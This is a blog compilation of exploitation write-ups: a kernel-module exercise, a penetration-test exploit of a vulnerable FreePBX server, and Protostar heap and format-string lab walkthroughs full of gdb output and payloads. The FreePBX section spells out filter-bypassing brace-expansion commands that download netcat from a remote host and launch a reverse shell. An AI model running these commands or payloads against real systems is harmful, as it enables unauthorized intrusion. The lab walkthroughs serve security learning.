Adventures in Linux Kernel — Task 01
Not so long ago, after I started researching Linux kernel I got curious about how can I contribute into the kernel and I found. This challenge is about step by step immersion into kernel module writing. There will be more!
Authors of this challenge ask not to post code publicly. I don’t agree with them because this challenge is for people who are willing to learn and they’re apriory would’t search for ready-to-use answers. However I won’t do it in respect of creators of this challenge. But if you need a nudge feel free to contact me via email.
The first task was to write a kernel module. It is pretty easy if you are familiar with C language. There’re only three functions we need: init_module
, cleanup_module
and printk
. The main function here is init_module
. From man
we have:
init_module()
loads an ELF image into kernel space, performs any necessary symbol relocations, initializes module parameters to values provided by the caller, and then runs the module’s init function. This system call requires privilege.
On success, these system calls return 0. On error, -1 is returned and errno is set appropriately.
It’s a main function in kernel module (almost). cleanup_module
is a function which is called when a module is unloaded.
Then we can compile the module and load it:
make
insmod ./hello-1.ko
Then look at loaded modules:
cat /proc/modules | grep hello
Additionally you can see the last messages by using:
dmesg | tail -1
[ 1325.631657] Hello world!
It turned out to be not so easy and I got the following response:
Please print to the kernel debug log level.
Please read the requirements for the Makefile and allow the module to bebuilt against any kernel source tree on the filesystem, not just thosekernels that happened to be installed in /lib/ at some point in time.
I was asked to do the following:
Write a Linux kernel module, and stand-alone Makefile, that when loaded prints to the kernel debug log level, “Hello World!”
The Makefile should be able to build the kernel module against the source of the currently-running kernel as well as being able to accept an arbitrary kernel sources directory from an environment variable.
I found this helpful for writing Makefile
to build a kernel for multiple distributions.
As for debug messages, they are simple and could be found here.
FreePBX Exploit and Brace Expansion
During one penetration test, I stumbled upon a server running a vulnerable version of FreePBX. I tried a couple of exploits, but most of them did not work. The only exploit that worked was this curl
command.
To make running commands easier, I wrote a simple Python script.
Usage of the script: python freepbx.py <server> <command>
.
How it works
The developers attempted to prevent shell command injection by performing simple, yet inadequate, sanitization. Special chars were filtered, and thus I could not run nc -nv <ip> <port>
or echo aaa > file.txt
. I could only use one-word commands.
How can I use the exploit if I can not use spaces? It turned out, it is possible to run commands without spaces by using {ls,-l}
syntax, which is called brace expansion. Brace expansion is a mechanism by which arbitrary strings can be generated in Linux. It is similar to filename expansion. For example, echo a{d,c,b}e
would produce three strings — ade
, ace
, and abe
.
I needed to write files, but I could not use /
or \
. The workaround was to use a command echo "Hello world" | dd of=test.txt
where of
stands for Output File.
Then I needed to get a reverse shell, but I could not use dots and slashes. However, I could run commands, write files, and use command substitution. Therefore, I could run the following command to get a dot symbol:
python freepbx.py <server> "ls|{head,-n,1}|{cut,-c,5}|{dd,of=dot}"
This command writes a dot symbol into a file from ls
output. The dot happened to be the 5th symbol of the first file in this particular case.
Then I repeated the same process for the slash symbol, but this time I generated it from pwd
command output like this:
freepbx.py <server> "{pwd,}|{cut,-c,1}|{dd,of=slash}"
Now it was possible to get reverse shell:
python freepbx.py <server> "{wget,exgq\$({cat,dot})pw\$({cat,slash})nc}"
python freepbx.py <server> "{chmod,+x,nc}"
python freepbx.py <server> "{\$({cat,dot})\$({cat,slash})nc,exgq\$({cat,dot})pw
Exploit Exercises — Protostar Heap 3
This level was harder than previous ones. I needed to deep dive into how malloc
works and how to exploit the unlink
macros. Articles that helped me:
In our case we have 3 buffers, 32 bytes each:
a = malloc(32);
b = malloc(32);
c = malloc(32);
strcpy(a, argv[1]);
strcpy(b, argv[2]);
strcpy(c, argv[3]);
free(c);
free(b);
free(a);
Let’s see what happens when we run the program:
(gdb) b *main+136
Breakpoint 1 at 0x8048911: file heap3/heap3.c, line 24.
(gdb) r AAAA BBBB CCCC
Starting program: /opt/protostar/bin/heap3 AAAA BBBB CCCC
Breakpoint 1, 0x08048911 in main (argc=4, argv=0xbffff724) at heap3/heap3.c:24
24 heap3/heap3.c: No such file or directory.
in heap3/heap3.c
(gdb) x/12x 0x0804c008 - 8
0x804c000: 0x00000000 0x00000029 0x41414141 0x00000000
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c030 - 8
0x804c028: 0x00000000 0x00000029 0x42424242 0x00000000
0x804c038: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c048: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c058 - 8
0x804c050: 0x00000000 0x00000029 0x43434343 0x00000000
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
Now let’s see what happens after each free()
call:
(gdb) disassemble main
...
0x08048911 <main+136>: call 0x8049824 <free>
0x08048916 <main+141>: mov eax,DWORD PTR [esp+0x18]
0x0804891a <main+145>: mov DWORD PTR [esp],eax
0x0804891d <main+148>: call 0x8049824 <free>
0x08048922 <main+153>: mov eax,DWORD PTR [esp+0x14]
0x08048926 <main+157>: mov DWORD PTR [esp],eax
0x08048929 <main+160>: call 0x8049824 <free>
0x0804892e <main+165>: mov DWORD PTR [esp],0x804ac27
0x08048935 <main+172>: call 0x8048790 <puts@plt>
(gdb) b *main+148
Breakpoint 2 at 0x804891d: file heap3/heap3.c, line 25.
(gdb) b *main+160
Breakpoint 3 at 0x8048929: file heap3/heap3.c, line 26.
(gdb) b *main+165
Breakpoint 4 at 0x804892e: file heap3/heap3.c, line 28.
We set two new breakpoint before others free()
calls and one after the last free(a)
call. Contunue program and we stop right before the second free
call. Let’s examine the heap:
(gdb) x/12x 0x0804c058 - 8
0x804c050: 0x00000000 0x00000029 0x00000000 0x00000000
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
The we run over the second call:
(gdb) c
Continuing.
Breakpoint 3, 0x08048929 in main (argc=4, argv=0xbffff724) at heap3/heap3.c:26
26 in heap3/heap3.c
(gdb) x/12x 0x0804c008 - 8
0x804c000: 0x00000000 0x00000029 0x41414141 0x00000000 ; a
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c030 - 8
0x804c028: 0x00000000 0x00000029 0x0804c050 0x00000000 ; b
0x804c038: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c048: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c058 - 8
0x804c050: 0x00000000 0x00000029 0x00000000 0x00000000 ; c
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
And after the free(a)
:
(gdb) c
Continuing.
Breakpoint 4, main (argc=4, argv=0xbffff724) at heap3/heap3.c:28
28 in heap3/heap3.c
(gdb) x/12x 0x0804c008 - 8
0x804c000: 0x00000000 0x00000029 0x0804c028 0x00000000 ; a
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c030 - 8
0x804c028: 0x00000000 0x00000029 0x0804c050 0x00000000 ; b
0x804c038: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c048: 0x00000000 0x00000000 0x00000000 0x00000029
(gdb) x/12x 0x0804c058 - 8
0x804c050: 0x00000000 0x00000029 0x00000000 0x00000000 ; c
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
As we can see the chunks are stored in single-linked lists. There’s some good explanation to this:
freed chunks smaller than 64 bytes are placed into a single-linked list
So we need to set the size of a chunk greater that 64 bytes so that unlink
got called.
After freeing all chunks we can look at bins:
(gdb) disassemble free
Dump of assembler code for function free:
...
0x0804982a <free+6>: mov DWORD PTR [ebp-0x38],0x804b160 ; bins address
...
(gdb) x/16x 0x804b160
0x804b160 <av_>: 0x00000048 0x00000000 0x00000000 0x00000000
0x804b170 <av_+16>: 0x0804c000 0x00000000 0x00000000 0x00000000
0x804b180 <av_+32>: 0x00000000 0x00000000 0x00000000 0x0804c078
0x804b190 <av_+48>: 0x00000000 0x00000000 0x00000000 0x0804b194
We can see a bin with the index 5 points to the first chunk (which is a
and has 0x0804c000
address).
Check if we overwrote prevsize
:
(gdb) r AAAA `python -c "print 'A'*32 + '\xfc\xff\xff\xff' + '\xf0'"` DEADBEEF
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA `python -c "print 'A'*32 + '\xfc\xff\xff\xff' + '\xf0'"` DEADBEEF
Breakpoint 1, 0x08048911 in main (argc=4, argv=0xbffff704) at heap3/heap3.c:24
24 in heap3/heap3.c
(gdb) x/32x 0x0804c058 - 8
0x804c050: 0xfffffffc 0x000000f0 0x44414544 0x46454542
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
0x804c080: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c090: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0c0: 0x00000000 0x00000000 0x00000000 0x00000000
Since PREV_INUSE
is unset it will think about buffer b
as freed. Since we cannot use 0x00
bytes, we use negative values as size
. We use 0xfffffffc
which is 0b11111111111111111111111111111100
. Thus it will run p = chunk_at_offset(p, -(long)prevsz)
and will treat p+4
as a pointer to the previous chunk.
If we call free
on a chunk which has bk
and fd
pointers overwritten, then we will overwrite fd+12
with bk
and then bk+8
with fd
. If you don’t understand it, take a look at unlink
macro again:
#define unlink( P, BK, FD ) { \
BK = P->bk; \
FD = P->fd; \
FD->bk = BK; \
BK->fd = FD; \
}
Now let’s find what and where we need to write. Let’s find the address of winner()
:
$ readelf -Ws heap3 | grep winner
74: 08048864 37 FUNC GLOBAL DEFAULT 14 winner
And for example we want to replace puts()
in GOT:
user@protostar:/opt/protostar/bin$ readelf -r heap3 | grep puts
0804b128 00000e07 R_386_JUMP_SLOT 00000000 puts
Assuming that we will write at bk+8
, bk
must be 0x0804b128 - 0x0c = 0x804b11c
.
So let’s test our exploit:
(gdb) r AAAA `python -c "print 'B'*32 + '\xfc\xff\xff\xff' + '\xf0'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x64\x88\x04\x08'"`
Starting program: /opt/protostar/bin/heap3 AAAA `python -c "print 'B'*32 + '\xfc\xff\xff\xff' + '\xf0'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x64\x88\x04\x08'"`
Program received signal SIGSEGV, Segmentation fault.
0x08049906 in free (mem=0x804c058) at common/malloc.c:3638
3638 in common/malloc.c
It crashed. Let’s find if we rewrote GOT entry:
(gdb) x/x 0x0804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x08048864
We did! But why did we get this SEGFAULT?
(gdb) x/i 0x08049906
0x8049906 <free+226>: mov DWORD PTR [eax+0x8],edx
(gdb) i r eax edx
eax 0x8048864 134514788
edx 0x804b11c 134525212
It’s getting clearer — it tried to write at winner() + 0x8
and got an error because winner()
is in a read-only segment. To circumvent this, we will create a shellcode calling winner()
, then we’ll write the address of the shellcode into GOT and mov DWORD PTR [eax+0x8],edx
will be executed successfully.
Trying to use a pointer to buffer instead of a direct pointer to winner()
:
(gdb) r `python -c "print 'A'*32"` `python -c "print 'B'*32 + '\xfc\xff\xff\xff' + '\xf0'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x08\xc0\x04\x08'"`
Starting program: /opt/protostar/bin/heap3 `python -c "print 'A'*32"` `python -c "print 'B'*32 + '\xfc\xff\xff\xff' + '\xf0'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x08\xc0\x04\x08'"`
Program received signal SIGSEGV, Segmentation fault.
0x08049951 in free (mem=0x804c058) at common/malloc.c:3648
3648 in common/malloc.c
(gdb) x/i $eip
0x8049951 <free+301>: mov DWORD PTR [eax+0xc],edx
(gdb) i r eax edx
eax 0x0 0
edx 0x0 0
Crashed again. At least we rewrote our first buffer (see at 0x804c010
):
(gdb) x/24x 0x0804c000
0x804c000: 0x00000000 0x00000029 0x41414141 0x41414141
0x804c010: 0x0804b11c 0x41414141 0x41414141 0x41414141
0x804c020: 0x41414141 0x41414141 0x00000000 0x00000029
0x804c030: 0x42424242 0x42424242 0x42424242 0x42424242
0x804c040: 0x42424242 0x42424242 0x42424242 0x42424242
0x804c050: 0xfffffffc 0x000000f0 0x43434343 0x0804b11c
After a day of googling I understood why this SEGFAULT happens — because the next chunk is not valid and it tries to check the next chunk. So I needed to create a new fake chunk. I will use -32
byte offset which in hex representation is:
>>> i = -32
>>> hex(i & 0xffffffff)
'0xffffffe0'
Then I will create “fake” header. size
in our fake header will be -8
which is 0xfffffff8
. Thus our next next chunk will point directly to our b
buffer which has PREV_IN_USE
bit set:
(gdb) r `python -c "print 'A'*32"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x08\xc0\x04\x08'"`
Starting program: /opt/protostar/bin/heap3 `python -c "print 'A'*32"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x08\xc0\x04\x08'"`
Program received signal SIGILL, Illegal instruction.
0x0804c035 in ?? ()
(gdb) x/16x $eip
0x804c035: 0x42ffffff 0x42424242 0x42424242 0x42424242
0x804c045: 0x42424242 0x42424242 0xfc424242 0xe0ffffff
0x804c055: 0xddffffff 0x94ffffff 0x940804b1 0x000804b1
0x804c065: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/x 0x0804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x0804c008
New SEGFAULT and we are sure that we changed the flow. Then I changed A
to \xcc
in order to have breakpoints instead of shellcode:
(gdb) r `python -c "print '\xcc'*32"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x08\xc0\x04\x08'"`
Program received signal SIGTRAP, Trace/breakpoint trap.
0x0804c00d in ?? ()
Let’s look closer at the address where we jump to:
(gdb) x/x 0x0804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x0804c008
(gdb) x/16x 0x0804c008
0x804c008: 0x0804c028 0xcccccccc 0x0804b11c 0xcccccccc
0x804c018: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x804c028: 0x00000000 0x00000029 0x00000000 0xfffffff8
0x804c038: 0x42424242 0x42424242 0x42424242 0x42424242
0x0804c028
is just the address of the next chunk. It is there because free(a)
was called. Let’s change values a bit to jump over this:
(gdb) r `python -c "print '\xcc'*32"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x10\xc0\x04\x08'"`
Program received signal SIGTRAP, Trace/breakpoint trap.
0x0804c011 in ?? ()
(gdb) x/16x 0x0804c000
0x804c000: 0x00000000 0x00000029 0x0804c028 0xcccccccc
0x804c010: 0xcccccccc 0xcccccccc 0x0804b11c 0xcccccccc
0x804c020: 0xcccccccc 0xcccccccc 0x00000000 0x00000029
0x804c030: 0x00000000 0xfffffff8 0x42424242 0x42424242
(gdb) x/x 0x0804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x0804c010
After that I modiefied the first buffer (where our shellcode is) to call winner()
:
$ rasm2 -a x86 -b32 'push 0x8048864; ret;'
6864880408c3
Then I changed the exploit:
(gdb) r `python -c "print '\xcc'*8 + '\x68\x64\x88\x04\x08\xc3'"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x10\xc0\x04\x08'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 `python -c "print '\xcc'*8 + '\x68\x64\x88\x04\x08\xc3'"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x10\xc0\x04\x08'"`
that wasn't too bad now, was it? @ 1484671479
Program exited with code 056.
Run from console:
./heap3 `python -c "print '\xcc'*8 + '\x68\x64\x88\x04\x08\xc3'"` `python -c "print 'BBBB' + '\xf8\xff\xff\xff' + 'B'*24 + '\xfc\xff\xff\xff' + '\xe0\xff\xff\xff'"` `python -c "print 'CCCC' + '\x1c\xb1\x04\x08' + '\x10\xc0\x04\x08'"`
that wasn't too bad now, was it? @ 1484671532
Exploit Exercises — Protostar Heap 2
There are a few interesting things here. The first one is in this code:
if(strlen(line + 5) < 31) {
strcpy(auth->name, line + 5);
}
We see that the length of line
parameter is checked. That means we cannot just overflow auth->name
.
The second one is in this code:
auth = malloc(sizeof(auth));
When malloc()
reserves space, it uses sizeof(auth)
. However auth
is a pointer. Thus, it uses a size of an address of the structure instead of the structure itself. It should be sizeof(struct auth)
.
You can make sure, that the addresses increased by 0x10
each time we allocate new memory by calling auth
:
auth a
[ auth = 0x804c008, service = (nil) ]
auth a
[ auth = 0x804c018, service = (nil) ]
0x10
is a space needed for:
- a chunk header
auth
space which is just 4 bytes in our case
- a padding for aligning an allocated memory on an 8-byte boundary
To undersrand how an allocated memory looks, just use this picture:

We see the program uses strdup()
, which allocates a copy of a char*
on the heap. In other words it uses malloc()
in its internals. So we can use this function to allocate additional heap memory.
We need to construct a pseudo heap chunk as if it was 32 bytes allocated. Don’t forget to take into account a size of chunk header used by strdup()
. Then we need to write a variable right after it.
A little explanation to what is going to happen. We need our memory to look like this after execution:
auth chunk header [8]
-------------------------- chunk header --------------------------
auth chunk data [4]
padding to be aligned [4] /* remember that 0x10 */
---- end of auth ----
service chunk header [8]
service chunk data [16] /* 16 is a calculated value */
------------------------ 32 bytes of data ------------------------
auth [4]
Construct and run the exploit:
$ python -c "print 'auth a'+'\n'+'service'+'A'*16+'\xff'+'\n'+'login'" | ./heap2
[ auth = (nil), service = (nil) ]
[ auth = 0x804c008, service = (nil) ]
[ auth = 0x804c008, service = 0x804c018 ]
you have logged in already!
[ auth = 0x804c008, service = 0x804c018 ]
Exploit Exercises — Protostar Heap 1
This level is different. Finding a vulnerability in the code is easy:
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
There are no buffer length checks. We can crash our program like this:
$ ./heap1 `python -c "print 'A'*30"` aaa
Segmentation fault
But when you use smaller input, it runs without any errors:
$ ./heap1 `python -c "print 'A'*20"` aaa
and that's a wrap folks!
Why is this hapenning? I started gdb
and overflowed the input by 1 byte:
(gdb) r `python -c "print 'A'*21"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*21"` aaa
Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x8040041 <Address 0x8040041 out of bounds>, src=0xbffff899 "aaa")
at strcpy.c:40
40 strcpy.c: No such file or directory.
in strcpy.c
I noticed that there is 0x41
byte inside strcpy()
function. That looked strange, so I run the program again, but I overflowed it with 2 bytes this time:
(gdb) r `python -c "print 'A'*22"` aaa
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*22"` aaa
Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x8004141 <Address 0x8004141 out of bounds>, src=0xbffff899 "aaa")
at strcpy.c:40
40 strcpy.c: No such file or directory.
in strcpy.c
Certainly, we are rewriting the address of a buffer in strcpy()
. Since the second parameter passed to the function is aaa
, it means that we are in the second strcpy()
function.
At this moment I realized how I can exploit this app. As we control which address is getting rewriten by the second strcpy()
writes, we can rewrite it by the return address from the stack. For example, the second strcpy()
can write the second input parameter into it. As a result, we can change the program flow.
Let’s examine the stack after the crash:
(gdb) r `python -c "print 'A'*30"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*30"` aaa
Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x41414141 <Address 0x41414141 out of bounds>, src=0xbffff899 "aaa")
at strcpy.c:40
40 strcpy.c: No such file or directory.
in strcpy.c
(gdb) x/2x $esp
0xbffff640: 0x00000000 0x00000000
(gdb) x/20x $esp
0xbffff640: 0x00000000 0x00000000 0xbffff678 0x0804855a
0xbffff650: 0x41414141 0xbffff899 0x08048580 0xbffff678
0xbffff660: 0xb7ec6365 0x0804a008 0x0804a028 0xb7fd7ff4
0xbffff670: 0x08048580 0x00000000 0xbffff6f8 0xb7eadc76
0xbffff680: 0x00000003 0xbffff724 0xbffff734 0xb7fe1848
0x41414141
is the address of a buffer for strcpy()
. There’s 0xbffff899
after it, it’s an address of aaa
string (we can see it from the error). Before 0x41414141
there are two addresses. Probably it’s saved eip
and ebp
registers. Let’s look at registers:
(gdb) info registers
...
esp 0xbffff640 0xbffff640
ebp 0xbffff648 0xbffff648
...
eip 0xb7f09df4 0xb7f09df4 <*__GI_strcpy+20>
...
Our assumption is correct.
So we need to rewrite the address i2->name
by the address of the return address on the stack. We start rewriting after 20 byte and we know the address of the return address on the stack is 2 words ahead, so it is 0xbffff640 + 3*4 = 0xbffff64c
. Let’s try to rewrite i2->name
, run gdb
and set breakpoint on the second strcpy()
call:
(gdb) b* 0x08048555
Breakpoint 1 at 0x8048555: file heap1/heap1.c, line 32.
(gdb) r `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` CCCC
Breakpoint 1, 0x08048555 in main (argc=3, argv=0xbffff724) at heap1/heap1.c:32
32 in heap1/heap1.c
If we look at our stack, we can see that it was successfully rewritten by 0x43434343
(see the value on 0xbffff64c
memory address):
(gdb) s
...
(gdb) s
...
(gdb) x/24x $esp-12
0xbffff634: 0xb7ff6210 0xbffff87b 0xb7f09de0 0x00000000
0xbffff644: 0x00000000 0xbffff678 0x43434343 0xbffff64c
0xbffff654: 0xbffff894 0x08048580 0xbffff678 0xb7ec6365
0xbffff664: 0x0804a008 0x0804a028 0xb7fd7ff4 0x08048580
0xbffff674: 0x00000000 0xbffff6f8 0xb7eadc76 0x00000003
0xbffff684: 0xbffff724 0xbffff734 0xb7fe1848 0xbffff6e0
Now we need to replace the second parameter with the address of winner()
function. We can get the address of the function using readelf
:
$ readelf -Ws heap1 | grep winner
55: 08048494 37 FUNC GLOBAL DEFAULT 14 winner
Or from gdb
:
(gdb) print winner
$1 = {void (void)} 0x8048494 <winner>
Now we can run out exploit:
(gdb) r `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
and we have a winner @ 1484241540
Program received signal SIGILL, Illegal instruction.
0xbffff602 in ?? ()
If we run it from console only, it won’t work because of environment variables. Let’s find the correct address:
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) r `python -c "print 'A'*30"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*30"` aaa
Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x41414141 <Address 0x41414141 out of bounds>, src=0xbffffdb0 "aaa") at strcpy.c:40
40 strcpy.c: No such file or directory.
in strcpy.c
(gdb) x/8x $esp
0xbffffb60: 0x00000000 0x00000000 0xbffffb98 0x0804855a
0xbffffb70: 0x41414141 0xbffffdb0 0x08048580 0xbffffb98
Calculate the offset like before 0xbffffb60 + 12 = 0x0xbffffb6c
and run exploit in console:
$ /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x6c\xfb\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
and we have a winner @ 1484242022
Segmentation fault
Exploit Exercises — Protostar Heap 0
This level is a lot like classical stack overflows.
Let’s crash the app first:
(gdb) r `python -c "print 'A'*1000"`
Starting program: /opt/protostar/bin/heap0 `python -c "print 'A'*1000"`
data is at 0x804a008, fp is at 0x804a050
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Now let’s find the offset using patterns from msfconsole
. Generate a pattern using this command:
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
Then run the program with the pattern as input:
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
Starting program: /opt/protostar/bin/heap0 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
data is at 0x804a008, fp is at 0x804a050
Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()
Then search for 0x41346341
in the pattern:
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41346341
[*] Exact match at offset 72
The output above means that we need to rewrite 72 bytes before reaching eip
.
Now we need to find the address of winner()
:
$ readelf -s heap0
...
55: 08048464 20 FUNC GLOBAL DEFAULT 14 winner
Now let’s use this address in the exploit:
$ ./heap0 `python -c "print 'A'*72 + '\x64\x84\x04\x08'"`
data is at 0x804a008, fp is at 0x804a050
level passed
This is a protostar walkthrough describing format string exploitation.
This article is the only thing you need to complete these levels.
$ ./format0 %64d`python -c 'print "\xef\xbe\xad\xde"'`
you have hit the target correctly :)
When we use %64d
, sprintf
pops 64 bytes from the stack and then adds 0xdeadbeef
and copies it into buffer
causing overflow.
Read this first to understand how different variables are stored. Then we look for target
:
$ objdump -t format1 | grep target
08049638 g O .bss 00000004 target
We see the needed variable is in uninitialized data segment called .bss
and has the address 0x08049638
.
Then I tried to print 146 bytes from the stack and tried to find where our buffer is stored:
$ ./format1 ABCD`python -c 'print "%x."*146'`
ABCD804960c.bffff508.8048469.b7fd8304.b7fd7ff4.bffff508.8048435.bffff708.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff588.b7eadc76.2.bffff5b4.bffff5c0.b7fe1848.bffff570.ffffffff.b7ffeff4.804824d.1.bffff570.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff588.a003ccb4.8a519aa4.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff5b4.8048450.8048440.b7ff1040.bffff5ac.b7fff8f8.2.bffff6fe.bffff708.0.bffff8c3.bffff8d8.bffff8ef.bffff907.bffff915.bffff929.bffff94c.bffff963.bffff976.bffff980.bffffe70.bffffe89.bffffec7.bffffedb.bffffef9.bfffff10.bfffff21.bfffff3c.bfffff44.bfffff54.bfffff61.bfffff97.bfffffac.bfffffc0.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.78bfbbf.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff6db.1f.bffffff2.f.bffff6eb.0.0.0.0.0.50000000.f6e2fdf8.67e5aff4.14e8ba4e.6901a7c9.363836.0.0.0.2f2e0000.6d726f66.317461.44434241.252e7825.78252e78.2e78252e.252e7825.
Can you see that 0x44434241
value in the end? Also you can use some bruteforce:
$ for i in {1..1000}; do echo -n "$i ";./format1 "ABCD%$i\$x" | grep 44434241; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
141
142 ABCD44434241
%4$x
is what called “direct access”.
You can see ABCD
above (don’t forget we are on little-endian machine). Now we know the offset and we can try to directly access this variable:
./format1 ABCD`python -c 'print "%142$x"'`
ABCD44434241u
Now we know the offset in the stack in printf
and we can rewrite the value using %n
. Read more about using %n
here. In a nutshell, using %n
you must specify address of int
variable where the size of written data will be written to.
So if you use something like <addr>%141%n
it will pop addr
from the stack and will write the number of written bytes there.
We know the address is 0x08049638
that in little-endian format is \x38\x96\x04\x08
. Now we can simply replace ABCD
with the address:
$ ./format1 `python -c 'print "\x38\x96\x04\x08"+"%142$n"'`
8�you have modified the target :)
Now we are supposed to rewrite the variable with a particular value 64.
Now let’s do a bit of bruteforcing to find the offset:
